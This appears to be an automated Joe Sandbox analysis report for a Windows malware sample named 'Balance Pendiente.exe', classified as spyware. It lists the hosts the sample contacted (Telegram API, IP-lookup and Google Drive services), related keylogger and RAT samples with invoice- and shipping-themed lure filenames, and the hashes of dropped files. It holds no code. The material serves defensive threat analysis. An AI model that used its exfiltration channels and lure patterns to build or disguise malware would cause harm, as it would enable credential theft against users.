                                                                                                                                      api.telegram.orgUnited Kingdom
                                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                                      104.21.96.1
                                                                                                                                      reallyfreegeoip.orgUnited States
                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                      172.217.18.14
                                                                                                                                      drive.google.comUnited States
                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                      158.101.44.242
                                                                                                                                      checkip.dyndns.comUnited States
                                                                                                                                      31898ORACLE-BMC-31898USfalse
                                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                                      Analysis ID:1623448
                                                                                                                                      Start date and time:2025-02-25 08:25:40 +01:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 6m 38s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:8
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:Balance Pendiente.exe
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@6/15@5/5
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 33.3%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 97%
                                                                                                                                      • Number of executed functions: 132
                                                                                                                                      • Number of non-executed functions: 65
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.67
                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                      • Execution Graph export aborted for target msiexec.exe, PID 5660 because it is empty
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 6964 because it is empty
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                      TimeTypeDescription
                                                                                                                                      02:26:38API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                                                                      02:27:41API Interceptor74545x Sleep call for process: msiexec.exe modified
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      149.154.167.220Profoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            DHL Shipping Details Ref ID 44633179800-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                  Minty.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    https://meta-bussiness-support.pages.dev/check-community-2692560460(SiGet hashmaliciousUnknownBrowse
                                                                                                                                                      PRUEBA 2.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        104.21.96.1PO.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                        • touxzw.ir/sccc/five/fre.php
                                                                                                                                                        OEoRzjI7JgSiUUd.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                        • touxzw.ir/sss2/five/fre.php
                                                                                                                                                        REQUEST FOR QUOTATION 2025.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.clouser.store/3r9x/
                                                                                                                                                        http://verification-center-00225526.iwantfoundation.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • verification-center-00225526.iwantfoundation.org/banner-b1482d4c.webp
                                                                                                                                                        uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.tumbetgirislinki.fit/k566/
                                                                                                                                                        gH68ux6XtG.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.tumbetgirislinki.fit/k566/
                                                                                                                                                        Drawing.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.lucynoel6465.shop/5f9p/
                                                                                                                                                        pappy.ps1Get hashmaliciousFormBookBrowse
                                                                                                                                                        • www.cheapwil.shop/8cv8/
                                                                                                                                                        Payment Swift Copy 76432650263970239=.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.clouser.store/3r9x/
                                                                                                                                                        SecuriteInfo.com.W32.AutoIt.WG.gen.Eldorado.29861.20258.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.clouser.store/m93s/
                                                                                                                                                        158.101.44.242DHL- CBJ520818836689.pdf.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        Shipping Doc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        PO-264725.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        PO# ENQ8864.Pdf.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        Commercial Invoice-011212250.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        AWB_3570456515#U00b7PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        Swift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        proforma fatura No. 90273641836.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        checkip.dyndns.comProfoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        Commercial Invoice1.cmdGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        DHL Shipping Details Ref ID 44633179800-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        CERENAK-8392.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        Minty.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        reallyfreegeoip.orgProfoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.32.1
                                                                                                                                                        Commercial Invoice1.cmdGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        DHL Shipping Details Ref ID 44633179800-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        CERENAK-8392.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.112.1
                                                                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.32.1
                                                                                                                                                        RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        Minty.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.112.1
                                                                                                                                                        api.telegram.orgProfoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DHL Shipping Details Ref ID 44633179800-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Minty.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://meta-bussiness-support.pages.dev/check-community-2692560460(SiGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        PRUEBA 2.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        TELEGRAMRUProfoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DHL Shipping Details Ref ID 44633179800-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.7122.15013.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        build.exeGet hashmaliciousVidarBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        Minty.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://meta-bussiness-support.pages.dev/check-community-2692560460(SiGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        ORACLE-BMC-31898USCommercial Invoice1.cmdGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        CERENAK-8392.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        71Jx3gwamwuCIHy.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        SKMINV_021820.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 193.122.130.0
                                                                                                                                                        DHL- CBJ520818836689.pdf.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        z35Payment-swift1039.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.130.0
                                                                                                                                                        CERENAK-8392.exeGet hashmaliciousCryptOne, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        CLOUDFLARENETUShttps://tampopo304-my.sharepoint.com/personal/t_peter_tampopo_co_uk/_layouts/15/guestaccess.aspx?share=ErD6Vn1_jHJCkzNA55SF53AB1bLxHPSyAiXwDO2SC9GB1Q&e=F2hCiyGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        Profoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.32.1
                                                                                                                                                        Commercial Invoice1.cmdGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 172.67.197.8
                                                                                                                                                        f2FzB60knO.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                        • 172.64.41.3
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        Rooming list.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        PO-TS006630009-MRTUNNING.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 172.67.197.8
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adProfoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        Commercial Invoice1.cmdGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        DHL Shipping Details Ref ID 44633179800-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        CERENAK-8392.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        RFQ R2100131125.pdf.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        Minty.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eimage_2025-02-25_14-09-05-.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Profoma MATERIAL LISTO________Pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Rooming list.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        PO-TS006630009-MRTUNNING.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        SKMBBT_25022025.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DHL Shipment Document.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19BANK SLIP_TT COPY_0636300773456864-2-20-2024_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        14007799_MINES SERVICES SURINAME N.V.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        HKCU-09318CA #U2013 SANWHA E&C_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        SKMBBT_25022025.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        LocaWeb 373400#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        1101011011.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        Stormwater Works Drawings Spec.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        #U00e1raj#U00e1nlat#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                        • 142.250.185.193
                                                                                                                                                        • 172.217.18.14
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dllPRUEBA 2.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                          KWbWCYe6LB.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              #U8fdd#U89c4#U540d#U5355.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                hnTW5HdWvY.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):53158
                                                                                                                                                                  Entropy (8bit):5.062687652912555
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                                  MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                                  SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                                  SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                                  SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6656
                                                                                                                                                                  Entropy (8bit):5.028908901377071
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN
                                                                                                                                                                  MD5:51E63A9C5D6D230EF1C421B2ECCD45DC
                                                                                                                                                                  SHA1:C499CDAD5C613D71ED3F7E93360F1BBC5748C45D
                                                                                                                                                                  SHA-256:CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
                                                                                                                                                                  SHA-512:C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: PRUEBA 2.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: KWbWCYe6LB.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: DOCU800147001.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: #U8fdd#U89c4#U540d#U5355.exe, Detection: malicious, Browse
